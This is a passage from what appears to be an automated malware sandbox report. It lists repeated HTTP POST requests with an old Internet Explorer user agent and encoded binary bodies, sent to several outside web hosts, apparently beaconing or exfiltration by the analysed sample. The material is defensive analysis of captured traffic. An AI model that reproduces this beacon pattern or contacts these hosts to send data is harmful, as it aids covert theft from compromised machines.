47 61 51 71 6d 79 79 2b 2b 63 34 49 74 42 7a 36 64 6b 65 33 56 62 72 7a 55 2f 74 47 53 53 76 4b 2f 44 36 73 51 32 72 31 4d 4e 41 73 75 31 66 62 46 68 67 32 46 53 64 6a 51 31 63 4f 36 6d 6b 39 35 67 69 36 35 62 30 38 7a 4b 34 6a 50 36 61 31 49 5a 45 59 68 4c 62 6d 64 6e 46 61 2b 44 44 71 4d 2b 67 6c 61 52 48 66 68 56 65 4f 49 57 57 2f 48 77 70 54 75 45 7a 53 58 6b 4b 55 6b 43 44 38 68 56 2f 4c 31 6e 78 74 59 2b 6e 51 30 42 77 37 4f 4d 4f 70 61 6d 6f 30 37 4f 45 33 62 65 75 42 4e 4e 54 77 3d 3d Data Ascii: w8T++Jn/e9CRBGsxqOSCMDLjfiH33JV73YMp1Uj33bcJr+qwUeAvgTIHUOVo7AadxcNmLwlbU3MNxrmgVYXGnIqs7ZrVSj4r6ZnrFI7KEiz+ocHJMepFVtNfF9bsyI7alXsfHbfeJ7UMTA/RnQ/Jv/sGcQif0eYWSZbLBva1m/3t1mQXcK7m0rv0l9r7A4sgIiz/8Avih33KllBZUxrDdrvKHwHjgsQKjdRNb4JrLjRujQQ4ENetAiOrBP9KoUql3cOo9tl1s7DUxnc+c+N+IMmQllo0ZAOJVd0N24NTkmZlfmFi2qGOekfyHtHp5WWL9qebIYIMD8P6M6PpHhofFjGBjtahRtrXagIqII6hAqGhgE1wzt/d+oOiPagJeSVZL8iai9GGeMldeOGaQqmyy++c4ItBz6dke3VbrzU/tGSSvK/D6sQ2r1MNAsu1fbFhg2FSdjQ1cO6mk95gi65b08zK4jP6a1IZEYhLbmdnFa+DDqM+glaRHfhVeOIWW/HwpTuEzSXkKUkCD8hV/L1nxtY+nQ0Bw7OMOpamo07OE3beuBNNTw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 72 7a 74 5a 6c 43 54 4b 58 39 43 57 49 64 4a 4c 76 34 39 61 75 66 65 49 45 62 66 63 62 62 63 58 6d 4f 6d 6c 37 77 71 65 56 77 42 58 55 36 4a 34 57 6c 66 42 51 36 66 51 70 6a 48 72 5a 77 71 57 54 4d 61 7a 32 2f 67 35 79 48 32 63 30 2b 78 56 4d 57 4c 4e 63 61 64 7a 74 37 2b 54 4f 42 59 5a 48 68 68 55 6e 56 49 31 55 4b 32 76 63 32 51 71 45 34 68 6a 57 36 78 71 50 54 7a 32 47 64 58 59 6b 6f 7a 58 35 31 37 52 79 4c 42 54 31 69 77 44 4d 2b 65 59 53 68 65 56 62 61 75 39 2f 4a 35 58 62 51 68 73 33 54 65 4f 43 58 63 36 30 4e 75 56 5a 4e 62 46 71 48 35 77 6b 39 46 74 4f 79 42 50 61 38 30 59 6a 63 47 6a 2b 71 35 42 4c 51 62 50 38 33 43 32 6b 53 53 70 2b 47 76 44 35 4f 49 39 4b 7a 53 39 4d 33 61 45 55 30 70 72 45 52 30 4f 62 65 50 54 6e 6f 35 32 6f 51 4b 2b 63 66 57 31 48 4b 5a 48 2b 35 48 41 69 37 77 53 68 4e 76 54 6b 35 49 72 47 4a 33 4c 56 47 67 39 2b 65 33 36 4b 66 4f 70 39 58 6d 49 4e 68 6a 6d 61 30 56 45 39 2f 6c 6a 37 48 4e 39 69 2b 64 53 6e 55 71 51 70 4d 34 34 51 52 70 6b 7a 51 6b 44 65 50 64 43 77 39 52 56 78 4c 6a 61 75 34 5a 77 68 6f 7a 45 53 4c 49 7a 38 56 72 78 57 63 43 4b 35 49 4f 2b 36 63 6a 30 66 4f 2b 44 68 51 32 76 76 4e 64 42 64 67 37 31 6e 36 45 35 64 73 6e 42 6a 52 45 2b 39 43 79 46 74 53 58 6b 78 46 37 50 4b 6d 6e 72 43 54 6f 38 59 53 55 41 51 44 63 34 5a 55 2b 45 44 2f 69 46 79 6c 56 56 58 35 49 56 54 76 30 45 51 44 58 7a 47 62 51 79 68 57 6e 6a 71 39 4b 71 70 43 34 33 48 54 42 54 57 54 45 48 62 72 58 77 30 76 65 73 6e 56 32 64 77 44 79 53 51 37 69 61 45 31 2b 35 6e 42 41 6b 77 63 56 32 5a 47 59 2b 63 32 4b 71 34 34 39 64 52 4f 54 64 39 51 54 52 56 30 50 58 56 68 4b 31 79 63 71 58 55 75 52 4d 58 4b 4b 77 52 59 75 71 48 39 30 34 56 47 68 6a 41 43 2b 38 57 50 56 73 64 35 68 79 74 56 56 69 34 51 3d 3d Data Ascii: rztZlCTKX9CWIdJLv49aufeIEbfcbbcXmOml7wqeVwBXU6J4WlfBQ6fQpjHrZwqWTMaz2/g5yH2c0+xVMWLNcadzt7+TOBYZHhhUnVI1UK2vc2QqE4hjW6xqPTz2GdXYkozX517RyLBT1iwDM+eYSheVbau9/J5XbQhs3TeOCXc60NuVZNbFqH5wk9FtOyBPa80YjcGj+q5BLQbP83C2kSSp+GvD5OI9KzS9M3aEU0prER0ObePTno52oQK+cfW1HKZH+5HAi7wShNvTk5IrGJ3LVGg9+e36KfOp9XmINhjma0VE9/lj7HN9i+dSnUqQpM44QRpkzQkDePdCw9RVxLjau4ZwhozESLIz8VrxWcCK5IO+6cj0fO+DhQ2vvNdBdg71n6E5dsnBjRE+9CyFtSXkxF7PKmnrCTo8YSUAQDc4ZU+ED/iFylVVX5IVTv0EQDXzGbQyhWnjq9KqpC43HTBTWTEHbrXw0vesnV2dwDySQ7iaE1+5nBAkwcV2ZGY+c2Kq449dROTd9QTRV0PXVhK1ycqXUuRMXKKwRYuqH904VGhjAC+8WPVsd5hytVVi4Q==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 54 2b 4f 65 2f 4c 77 64 66 4e 41 4c 68 65 63 64 5a 31 33 78 4c 55 39 59 44 2b 6c 55 39 63 38 42 73 47 72 32 61 53 53 39 7a 69 79 56 72 78 4e 4d 43 6c 36 4a 44 38 4d 58 53 42 4c 5a 4a 30 54 2b 70 2f 72 55 68 65 6d 79 46 74 31 76 54 30 43 4e 38 67 65 6a 71 6a 65 33 32 4b 6e 42 59 4a 50 77 38 4e 58 2f 53 48 37 57 4e 56 42 61 4c 4b 63 53 71 55 74 2f 6b 6a 32 31 62 71 43 58 72 33 45 45 48 4f 34 70 4d 69 36 4b 6c 68 79 61 53 70 71 37 79 77 46 68 68 34 70 74 6e 58 73 52 4d 53 6b 4f 52 75 76 54 7a 67 44 4c 53 7a 77 56 4c 38 34 68 44 69 76 39 4f 4b 54 72 46 62 6b 6b 4f 36 54 69 36 6d 76 36 63 69 4f 37 79 4f 58 6d 6c 57 33 66 65 33 6a 56 4a 71 4e 37 48 6c 58 41 44 2f 52 61 6e 50 42 49 69 75 69 50 49 6a 31 6c 6e 55 71 66 41 4a 50 42 52 77 38 42 45 39 4b 71 6c 78 6f 35 57 51 6c 2f 68 63 6c 49 57 70 55 53 76 65 6b 67 33 5a 53 34 7a 52 63 6e 70 52 56 36 68 2b 41 38 51 52 6b 70 44 4c 7a 56 43 32 42 53 75 43 71 41 50 5a 57 4d 76 32 45 51 5a 6c 36 4a 73 71 56 30 55 78 77 39 43 71 77 6a 54 32 68 2b 44 76 46 61 38 68 42 62 59 69 53 4b 6e 68 38 6d 37 45 72 58 78 54 34 50 33 72 6e 74 62 37 65 52 58 72 51 43 2f 71 33 4e 48 49 74 38 78 76 58 36 6e 51 76 42 43 53 46 37 67 48 4f 77 6f 55 4b 54 67 51 39 69 4d 76 2f 54 4e 31 45 67 47 4d 4b 6a 77 6a 34 2f 79 6d 57 67 38 5a 63 5a 43 6b 52 75 57 33 6b 37 42 54 6b 2f 41 32 50 62 72 53 4c 77 39 6b 61 54 52 4b 6e 51 59 58 32 34 6d 51 56 41 61 58 57 76 46 57 67 7a 52 34 4b 44 52 32 68 49 46 5a 70 53 51 6b 67 6c 77 72 57 4d 57 78 37 48 31 54 4e 6f 32 4d 4c 75 36 6d 4f 62 6d 6c 42 57 59 38 46 43 56 49 48 73 6f 65 59 6f 75 78 36 44 59 52 67 5a 69 7a 62 6b 68 35 77 3d Data Ascii: T+Oe/LwdfNALhecdZ13xLU9YD+lU9c8BsGr2aSS9ziyVrxNMCl6JD8MXSBLZJ0T+p/rUhemyFt1vT0CN8gejqje32KnBYJPw8NX/SH7WNVBaLKcSqUt/kj21bqCXr3EEHO4pMi6KlhyaSpq7ywFhh4ptnXsRMSkORuvTzgDLSzwVL84hDiv9OKTrFbkkO6Ti6mv6ciO7yOXmlW3fe3jVJqN7HlXAD/RanPBIiuiPIj1lnUqfAJPBRw8BE9Kqlxo5WQl/hclIWpUSvekg3ZS4zRcnpRV6h+A8QRkpDLzVC2BSuCqAPZWMv2EQZl6JsqV0Uxw9CqwjT2h+DvFa8hBbYiSKnh8m7ErXxT4P3rntb7eRXrQC/q3NHIt8xvX6nQvBCSF7gHOwoUKTgQ9iMv/TN1EgGMKjwj4/ymWg8ZcZCkRuW3k7BTk/A2PbrSLw9kaTRKnQYX24mQVAaXWvFWgzR4KDR2hIFZpSQkglwrWMWx7H1TNo2MLu6mObmlBWY8FCVIHsoeYoux6DYRgZizbkh5w=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 54 2b 4f 65 2f 4c 77 64 66 4e 41 4c 68 65 63 64 5a 31 33 78 4c 55 39 59 44 2b 6c 55 39 63 38 42 73 47 72 32 61 53 53 39 7a 69 79 56 72 78 4e 4d 43 6c 36 4a 44 38 4d 58 53 42 4c 5a 4a 30 54 2b 70 2f 72 55 68 65 6d 79 46 74 31 76 54 30 43 4e 38 67 65 6a 71 6a 65 33 32 4b 6e 42 59 4a 50 77 38 4e 58 2f 53 48 37 57 4e 56 42 61 4c 4b 63 53 71 55 74 2f 6b 6a 32 31 62 71 43 58 72 33 45 45 48 4f 34 70 4d 69 36 4b 6c 68 79 61 53 70 71 37 79 77 46 68 68 34 70 74 6e 58 73 52 4d 53 6b 4f 52 75 76 54 7a 67 44 4c 53 7a 77 56 4c 38 34 68 44 69 76 39 4f 4b 54 72 46 62 6b 6b 4f 36 54 69 36 6d 76 36 63 69 4f 37 79 4f 58 6d 6c 57 33 66 65 33 6a 56 4a 71 4e 37 48 6c 58 41 44 2f 52 61 6e 50 42 49 69 75 69 50 49 6a 31 6c 6e 55 71 66 41 4a 50 42 52 77 38 42 45 39 4b 71 6c 78 6f 35 57 51 6c 2f 68 63 6c 49 57 70 55 53 76 65 6b 67 33 5a 53 34 7a 52 63 6e 70 52 56 36 68 2b 41 38 51 52 6b 70 44 4c 7a 56 43 32 42 53 75 43 71 41 50 5a 57 4d 76 32 45 51 5a 6c 36 4a 73 71 56 30 55 78 77 39 43 71 77 6a 54 32 68 2b 44 76 46 61 38 68 42 62 59 69 53 4b 6e 68 38 6d 37 45 72 58 78 54 34 50 33 72 6e 74 62 37 65 52 58 72 51 43 2f 71 33 4e 48 49 74 38 78 76 58 36 6e 51 76 42 43 53 46 37 67 48 4f 77 6f 55 4b 54 67 51 39 69 4d 76 2f 54 4e 31 45 67 47 4d 4b 6a 77 6a 34 2f 79 6d 57 67 38 5a 63 5a 43 6b 52 75 57 33 6b 37 42 54 6b 2f 41 32 50 62 72 53 4c 77 39 6b 61 54 52 4b 6e 51 59 58 32 34 6d 51 56 41 61 58 57 76 46 57 67 7a 52 34 4b 44 52 32 68 49 46 5a 70 53 51 6b 67 6c 77 72 57 4d 57 78 37 48 31 54 4e 6f 32 4d 4c 75 36 6d 4f 62 6d 6c 42 57 59 38 46 43 56 49 48 73 6f 65 59 6f 75 78 36 44 59 52 67 5a 69 7a 62 6b 68 35 77 3d Data Ascii: T+Oe/LwdfNALhecdZ13xLU9YD+lU9c8BsGr2aSS9ziyVrxNMCl6JD8MXSBLZJ0T+p/rUhemyFt1vT0CN8gejqje32KnBYJPw8NX/SH7WNVBaLKcSqUt/kj21bqCXr3EEHO4pMi6KlhyaSpq7ywFhh4ptnXsRMSkORuvTzgDLSzwVL84hDiv9OKTrFbkkO6Ti6mv6ciO7yOXmlW3fe3jVJqN7HlXAD/RanPBIiuiPIj1lnUqfAJPBRw8BE9Kqlxo5WQl/hclIWpUSvekg3ZS4zRcnpRV6h+A8QRkpDLzVC2BSuCqAPZWMv2EQZl6JsqV0Uxw9CqwjT2h+DvFa8hBbYiSKnh8m7ErXxT4P3rntb7eRXrQC/q3NHIt8xvX6nQvBCSF7gHOwoUKTgQ9iMv/TN1EgGMKjwj4/ymWg8ZcZCkRuW3k7BTk/A2PbrSLw9kaTRKnQYX24mQVAaXWvFWgzR4KDR2hIFZpSQkglwrWMWx7H1TNo2MLu6mObmlBWY8FCVIHsoeYoux6DYRgZizbkh5w=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 77 38 54 2b 2b 4a 6e 2f 65 39 43 52 42 47 73 78 71 4f 53 43 4d 44 4c 6a 66 69 48 33 33 4a 56 37 33 59 4d 70 31 55 6a 33 33 62 63 4a 72 2b 71 77 55 65 41 76 67 54 49 48 55 4f 56 6f 37 41 61 64 78 63 4e 6d 4c 77 6c 62 55 33 4d 4e 78 72 6d 67 56 59 58 47 6e 49 71 73 37 5a 72 56 53 6a 34 72 36 5a 6e 72 46 49 37 4b 45 69 7a 2b 6f 63 48 4a 4d 65 70 46 56 74 4e 66 46 39 62 73 79 49 37 61 6c 58 73 66 48 62 66 65 4a 37 55 4d 54 41 2f 52 6e 51 2f 4a 76 2f 73 47 63 51 69 66 30 65 59 57 53 5a 62 4c 42 76 61 31 6d 2f 33 74 31 6d 51 58 63 4b 37 6d 30 72 76 30 6c 39 72 37 41 34 73 67 49 69 7a 2f 38 41 76 69 68 33 33 4b 6c 6c 42 5a 55 78 72 44 64 72 76 4b 48 77 48 6a 67 73 51 4b 6a 64 52 4e 62 34 4a 72 4c 6a 52 75 6a 51 51 34 45 4e 65 74 41 69 4f 72 42 50 39 4b 6f 55 71 6c 33 63 4f 6f 39 74 6c 31 73 37 44 55 78 6e 63 2b 63 2b 4e 2b 49 4d 6d 51 6c 6c 6f 30 5a 41 4f 4a 56 64 30 4e 32 34 4e 54 6b 6d 5a 6c 66 6d 46 69 32 71 47 4f 65 6b 66 79 48 74 48 70 35 57 57 4c 39 71 65 62 49 59 49 4d 44 38 50 36 4d 36 50 70 48 68 6f 66 46 6a 47 42 6a 74 61 68 52 74 72 58 61 67 49 71 49 49 36 68 41 71 47 68 67 45 31 77 7a 74 2f 64 2b 6f 4f 69 50 61 67 4a 65 53 56 5a 4c 38 69 61 69 39 47 47 65 4d 6c 64 65 4f 47 61 51 71 6d 79 79 2b 2b 63 34 49 74 42 7a 36 64 6b 65 33 56 62 72 7a 55 2f 74 47 53 53 76 4b 2f 44 36 73 51 32 72 31 4d 4e 41 73 75 31 66 62 46 68 67 32 46 53 64 6a 51 31 63 4f 36 6d 6b 39 35 67 69 36 35 62 30 38 7a 4b 34 6a 50 36 61 31 49 5a 45 59 68 4c 62 6d 64 6e 46 61 2b 44 44 71 4d 2b 67 6c 61 52 48 66 68 56 65 4f 49 57 57 2f 48 77 70 54 75 45 7a 53 58 6b 4b 55 6b 43 44 38 68 56 2f 4c 31 6e 78 74 59 2b 6e 51 30 42 77 37 4f 4d 4f 70 61 6d 6f 30 37 4f 45 33 62 65 75 42 4e 4e 54 77 3d 3d Data Ascii: w8T++Jn/e9CRBGsxqOSCMDLjfiH33JV73YMp1Uj33bcJr+qwUeAvgTIHUOVo7AadxcNmLwlbU3MNxrmgVYXGnIqs7ZrVSj4r6ZnrFI7KEiz+ocHJMepFVtNfF9bsyI7alXsfHbfeJ7UMTA/RnQ/Jv/sGcQif0eYWSZbLBva1m/3t1mQXcK7m0rv0l9r7A4sgIiz/8Avih33KllBZUxrDdrvKHwHjgsQKjdRNb4JrLjRujQQ4ENetAiOrBP9KoUql3cOo9tl1s7DUxnc+c+N+IMmQllo0ZAOJVd0N24NTkmZlfmFi2qGOekfyHtHp5WWL9qebIYIMD8P6M6PpHhofFjGBjtahRtrXagIqII6hAqGhgE1wzt/d+oOiPagJeSVZL8iai9GGeMldeOGaQqmyy++c4ItBz6dke3VbrzU/tGSSvK/D6sQ2r1MNAsu1fbFhg2FSdjQ1cO6mk95gi65b08zK4jP6a1IZEYhLbmdnFa+DDqM+glaRHfhVeOIWW/HwpTuEzSXkKUkCD8hV/L1nxtY+nQ0Bw7OMOpamo07OE3beuBNNTw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 66 61 4b 48 42 54 34 49 6a 64 41 43 34 32 71 55 43 52 4c 76 30 69 48 67 38 41 4c 2b 52 75 4e 78 55 6c 53 59 49 43 31 64 39 59 53 59 46 76 77 4d 79 66 33 37 36 53 31 31 67 2b 2f 36 6e 6d 55 48 4c 68 39 71 6f 2b 53 37 58 51 2f 4e 51 66 36 50 46 56 71 4a 54 4a 63 61 71 67 71 4f 6f 37 7a 39 64 72 65 49 4d 33 72 39 48 47 31 6c 32 34 72 48 39 72 79 78 59 71 64 64 4f 75 30 79 2b 53 58 55 4c 4a 36 6b 67 4d 42 2f 77 69 5a 4f 35 6b 30 4b 51 69 56 39 43 74 79 71 4a 73 79 49 56 66 6f 6c 63 4d 54 72 44 66 39 6e 78 6d 31 78 58 74 38 42 4f 30 64 51 6a 2b 77 4e 37 45 4f 75 62 54 69 70 38 42 56 67 4f 32 4b 4d 59 45 74 4a 2f 32 79 42 39 61 37 6a 5a 75 31 45 6a 6a 36 36 4e 52 50 47 6f 34 50 54 6e 31 75 38 57 30 70 63 42 65 42 4c 43 37 4c 32 66 6f 76 6e 67 31 48 73 42 2b 71 37 52 48 72 39 62 31 78 6c 39 5a 4a 4f 6b 46 74 5a 79 50 71 70 69 66 31 7a 30 34 63 78 4e 78 57 35 35 34 36 73 59 6e 71 68 69 59 65 50 46 33 31 46 41 6c 41 49 4a 53 4b 6c 61 38 4d 6d 34 57 63 55 72 56 76 55 42 36 32 32 37 6e 6a 77 65 44 34 6a 71 37 4f 35 72 46 69 31 64 55 2b 44 4e 39 66 43 48 4c 45 68 4e 65 68 4e 6b 31 74 4c 54 67 50 72 67 67 61 46 57 45 6d 35 57 62 79 71 63 56 4a 2f 4b 6c 6a 58 54 54 30 76 72 6d 37 64 35 78 54 54 63 42 53 68 67 38 58 7a 43 44 77 55 44 32 79 6d 66 46 79 47 48 33 43 6f 31 6b 5a 47 30 6e 35 75 59 76 4a 6d 5a 78 63 45 73 66 41 53 37 67 6c 50 4c 35 73 49 55 54 47 4a 76 57 65 4f 36 63 56 74 6e 66 67 36 66 4b 46 76 41 6d 72 59 5a 46 4e 46 61 67 65 4d 42 66 43 34 58 36 2b 52 59 63 56 32 46 32 6e 52 47 61 70 43 67 66 47 72 4d 71 6f 7a 48 38 73 7a 36 44 6a 66 2f 37 68 37 65 64 4f 36 59 2f 73 73 71 6c 2f 6d 61 7a 58 48 37 79 53 4a 68 4a 49 6f 75 7a 41 54 79 57 51 79 7a 50 57 43 59 31 63 47 33 48 66 61 44 2f 45 3d Data Ascii: faKHBT4IjdAC42qUCRLv0iHg8AL+RuNxUlSYIC1d9YSYFvwMyf376S11g+/6nmUHLh9qo+S7XQ/NQf6PFVqJTJcaqgqOo7z9dreIM3r9HG1l24rH9ryxYqddOu0y+SXULJ6kgMB/wiZO5k0KQiV9CtyqJsyIVfolcMTrDf9nxm1xXt8BO0dQj+wN7EOubTip8BVgO2KMYEtJ/2yB9a7jZu1Ejj66NRPGo4PTn1u8W0pcBeBLC7L2fovng1HsB+q7RHr9b1xl9ZJOkFtZyPqpif1z04cxNxW5546sYnqhiYePF31FAlAIJSKla8Mm4WcUrVvUB6227njweD4jq7O5rFi1dU+DN9fCHLEhNehNk1tLTgPrggaFWEm5WbyqcVJ/KljXTT0vrm7d5xTTcBShg8XzCDwUD2ymfFyGH3Co1kZG0n5uYvJmZxcEsfAS7glPL5sIUTGJvWeO6cVtnfg6fKFvAmrYZFNFageMBfC4X6+RYcV2F2nRGapCgfGrMqozH8sz6Djf/7h7edO6Y/ssql/mazXH7ySJhJIouzATyWQyzPWCY1cG3HfaD/E=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 53 74 79 58 73 6b 4c 33 6d 74 41 4e 77 6d 33 66 4e 63 31 44 75 4d 55 5a 36 62 4a 53 48 48 6e 70 6c 6b 6b 4e 32 44 4d 7a 43 52 36 74 46 56 4b 2f 65 74 48 51 45 61 47 53 45 55 55 57 76 62 33 47 41 54 5a 43 7a 76 76 4c 55 5a 55 79 56 39 56 66 74 41 44 6b 75 57 30 4b 2b 73 72 61 4e 36 6d 6c 6a 57 75 7a 58 69 75 52 35 4a 79 58 6a 4d 74 78 58 37 46 36 6a 7a 5a 67 39 4d 76 6a 69 48 55 73 79 37 70 36 75 34 55 69 42 62 47 4d 30 46 44 62 69 4c 72 39 4e 62 6b 64 48 70 41 6a 32 44 2b 34 41 62 6f 37 31 51 4a 56 30 6a 5a 78 75 4c 30 38 4b 2b 4d 68 4b 43 64 4c 35 4c 57 46 55 62 45 47 47 61 67 78 72 45 6c 32 4d 4f 69 75 66 69 6a 4b 2f 4a 6f 69 75 76 56 48 72 69 4a 64 4c 75 67 66 57 38 48 41 43 45 52 75 6d 6e 62 42 53 7a 45 74 71 77 4f 32 6a 74 37 50 54 77 75 62 47 78 37 48 4a 33 46 35 43 78 4a 64 64 49 6d 4b 32 6a 4b 65 76 61 45 4a 67 78 6b 35 64 5a 6a 45 57 4f 6e 75 6b 6c 34 55 45 75 6f 39 4f 64 62 47 6a 58 38 31 6b 66 35 78 7a 46 6c 71 5a 46 57 34 39 42 61 7a 72 38 59 4b 67 53 34 75 52 50 62 31 70 76 34 46 48 6f 4a 39 52 37 61 6d 7a 6b 2b 34 36 6c 36 36 30 32 2f 6d 73 42 6b 63 49 54 55 69 39 74 51 30 44 6d 2f 50 68 68 44 46 46 6b 4b 5a 44 48 51 2f 78 50 6f 53 50 72 6b 54 45 6a 57 6a 7a 35 61 56 41 73 4d 78 63 4e 56 76 70 33 34 6c 4a 30 77 77 49 65 2b 7a 6d 63 4d 65 73 6e 4a 50 4e 4d 78 2b 50 36 74 32 43 7a 38 70 56 51 42 4f 6d 79 6a 2b 74 50 47 62 30 79 63 39 6b 4d 6b 30 4f 42 77 65 76 51 4f 4e 47 30 57 61 2b 69 46 69 4e 69 75 49 43 4d 34 31 69 46 67 4e 66 6e 51 79 45 78 49 39 37 37 70 2f 38 77 39 50 4a 63 4f 65 44 74 38 38 77 6a 65 6f 30 6f 68 62 36 79 6b 68 33 6b 6a 30 6a 76 57 52 34 53 71 59 Data Ascii: StyXskL3mtANwm3fNc1DuMUZ6bJSHHnplkkN2DMzCR6tFVK/etHQEaGSEUUWvb3GATZCzvvLUZUyV9VftADkuW0K+sraN6mljWuzXiuR5JyXjMtxX7F6jzZg9MvjiHUsy7p6u4UiBbGM0FDbiLr9NbkdHpAj2D+4Abo71QJV0jZxuL08K+MhKCdL5LWFUbEGGagxrEl2MOiufijK/JoiuvVHriJdLugfW8HACERumnbBSzEtqwO2jt7PTwubGx7HJ3F5CxJddImK2jKevaEJgxk5dZjEWOnukl4UEuo9OdbGjX81kf5xzFlqZFW49Bazr8YKgS4uRPb1pv4FHoJ9R7amzk+46l6602/msBkcITUi9tQ0Dm/PhhDFFkKZDHQ/xPoSPrkTEjWjz5aVAsMxcNVvp34lJ0wwIe+zmcMesnJPNMx+P6t2Cz8pVQBOmyj+tPGb0yc9kMk0OBwevQONG0Wa+iFiNiuICM41iFgNfnQyExI977p/8w9PJcOeDt88wjeo0ohb6ykh3kj0jvWR4SqY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 57 39 73 75 33 56 52 5a 6e 4e 44 6c 63 30 4d 4f 4c 2f 51 71 32 61 64 54 41 55 58 4d 56 44 34 39 79 42 50 57 46 4e 4e 4a 65 49 56 44 63 4b 41 6f 2b 71 78 6a 6b 35 70 36 79 4a 49 4d 45 69 58 35 38 74 50 4d 49 55 75 57 74 35 39 55 47 78 46 36 47 6a 67 39 55 76 57 5a 74 4c 6d 38 73 2f 4f 6f 51 7a 55 32 4c 52 52 2f 4c 4b 5a 78 45 59 78 54 77 72 67 6b 49 34 69 68 6a 48 48 2f 4e 54 4a 74 30 4a 61 47 34 6b 6e 76 44 35 6d 52 4d 58 70 56 54 39 53 57 64 4e 70 55 4c 4f 55 54 74 50 4a 4a 41 36 59 79 33 5a 43 63 33 75 6e 59 6a 48 73 4b 55 51 34 48 44 6b 5a 54 66 41 6c 65 48 32 2b 4a 74 72 75 52 72 52 37 58 7a 64 62 4d 62 4b 62 5a 39 66 4d 77 6f 4d 52 4a 58 4b 2f 43 74 63 70 71 7a 68 33 48 4e 52 4a 42 57 41 34 4f 75 66 2f 6b 4c 78 33 56 52 34 44 31 65 62 49 42 71 42 72 72 31 48 73 69 4b 6c 4b 30 33 6a 56 63 52 36 41 69 38 38 38 6a 77 2b 30 79 6a 76 4d 39 44 4d 76 50 6e 48 57 47 63 54 6a 50 63 6e 43 43 75 6d 42 4b 53 50 30 42 48 5a 45 65 65 6a 79 46 6c 4c 70 53 37 58 41 58 73 77 39 72 50 4a 4c 46 70 33 61 53 69 62 41 75 46 74 53 6c 46 71 56 4c 56 2b 51 6a 44 72 53 77 66 6c 47 67 4e 55 42 58 78 75 49 56 63 59 74 32 37 6c 54 31 47 2f 63 46 69 69 68 56 6a 65 35 45 70 64 31 39 46 34 2f 6a 54 7a 43 67 31 30 59 53 41 51 6c 48 4d 43 4c 30 4c 6c 56 4d 67 33 71 6d 5a 2f 6d 64 49 41 59 79 4f 62 41 35 6f 78 53 45 46 2f 63 65 35 53 70 2b 4a 5a 32 73 2f 5a 76 39 42 6f 39 4f 49 48 33 70 68 65 59 54 64 30 2f 6f 70 62 36 72 47 6f 41 50 59 77 30 2f 4b 54 59 55 30 67 53 49 43 35 65 61 73 37 41 66 41 66 52 47 76 4e 75 67 62 36 4e 4f 4b 50 33 6f 2f 68 6a 73 79 76 36 73 66 44 39 4d 49 37 76 53 4b 41 3d 3d Data Ascii: W9su3VRZnNDlc0MOL/Qq2adTAUXMVD49yBPWFNNJeIVDcKAo+qxjk5p6yJIMEiX58tPMIUuWt59UGxF6Gjg9UvWZtLm8s/OoQzU2LRR/LKZxEYxTwrgkI4ihjHH/NTJt0JaG4knvD5mRMXpVT9SWdNpULOUTtPJJA6Yy3ZCc3unYjHsKUQ4HDkZTfAleH2+JtruRrR7XzdbMbKbZ9fMwoMRJXK/Ctcpqzh3HNRJBWA4Ouf/kLx3VR4D1ebIBqBrr1HsiKlK03jVcR6Ai888jw+0yjvM9DMvPnHWGcTjPcnCCumBKSP0BHZEeejyFlLpS7XAXsw9rPJLFp3aSibAuFtSlFqVLV+QjDrSwflGgNUBXxuIVcYt27lT1G/cFiihVje5Epd19F4/jTzCg10YSAQlHMCL0LlVMg3qmZ/mdIAYyObA5oxSEF/ce5Sp+JZ2s/Zv9Bo9OIH3pheYTd0/opb6rGoAPYw0/KTYU0gSIC5eas7AfAfRGvNugb6NOKP3o/hjsyv6sfD9MI7vSKA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 2f 46 6d 5a 6d 31 57 49 6f 74 44 32 53 39 6b 42 50 4c 31 4f 35 30 36 33 4d 75 46 6a 79 76 61 55 57 5a 6f 36 37 62 56 6e 30 57 31 41 36 71 6a 66 62 4f 5a 77 62 47 45 2f 56 76 59 70 54 68 33 6f 49 4c 35 6a 7a 6b 6f 64 4b 39 35 55 41 62 66 39 59 67 59 33 68 61 37 32 69 67 33 38 53 55 30 32 72 70 62 37 32 52 55 51 47 2b 74 6c 52 76 35 4c 31 52 66 54 51 4b 77 64 36 37 57 45 7a 51 45 6f 68 47 61 54 4d 34 59 79 44 77 31 58 74 70 4a 30 4a 70 51 68 52 39 70 54 74 47 6b 44 41 6c 44 36 54 76 4b 56 37 38 2f 32 6c 68 71 69 77 58 69 57 35 48 6a 71 61 75 63 50 6d 4b 6e 7a 4d 52 78 66 67 77 56 44 36 66 2f 62 73 36 67 59 64 36 4b 4a 78 56 31 79 64 47 64 51 37 50 78 49 